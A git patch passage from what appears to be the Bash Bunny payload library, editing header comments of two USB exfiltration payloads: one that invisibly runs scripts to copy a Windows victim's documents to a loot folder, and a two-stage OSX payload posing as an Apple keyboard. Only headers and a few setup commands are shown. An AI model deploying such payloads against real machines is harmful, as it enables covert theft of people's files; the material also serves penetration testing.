44f50d59..cf8e96c0 100644 --- a/payloads/library/exfiltration/usb_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/usb_exfiltrator/payload.txt @@ -3,14 +3,16 @@ # Title: USB Exfiltrator # Author: Hak5Darren # Version: 1.1 -# Target: Windows XP SP3+ +# Target: Windows XP # Props: Diggster, IMcPwn -# Category: Exfiltration -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn copies documents to the loot folder on the Bash Bunny. +# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies documents to the loot folder on the Bash Bunny. # +# LEDS: +# Yellow Blink: Attacking +# Green: Finished + GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE From 53aaa4d1c07da89b6313848e271c378b6d0135df Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:38:26 +0100 Subject: [PATCH 22/22] Cleanup: TwoStageMac: Update Payload Header --- payloads/library/exfiltration/TwoStageMac/payload.txt | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/payloads/library/exfiltration/TwoStageMac/payload.txt b/payloads/library/exfiltration/TwoStageMac/payload.txt index c6fb45c5..5d8186f5 100644 --- a/payloads/library/exfiltration/TwoStageMac/payload.txt +++ b/payloads/library/exfiltration/TwoStageMac/payload.txt @@ -1,12 +1,18 @@ # Title: TwoStageMac # Description: A simple two stage payload for OSX. Sample second stage # does some device profiling. +# # Author: Draxiom # Props: jdetmold # Version: 1.0 # Category: Exfiltration # Target: OSX # Attack Modes: HID, STORAGE +# LEDS: +# Magenta - Setup +# Yellow Blink - Attacking +# White - Clean up +# Green - Finished LED SETUP ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE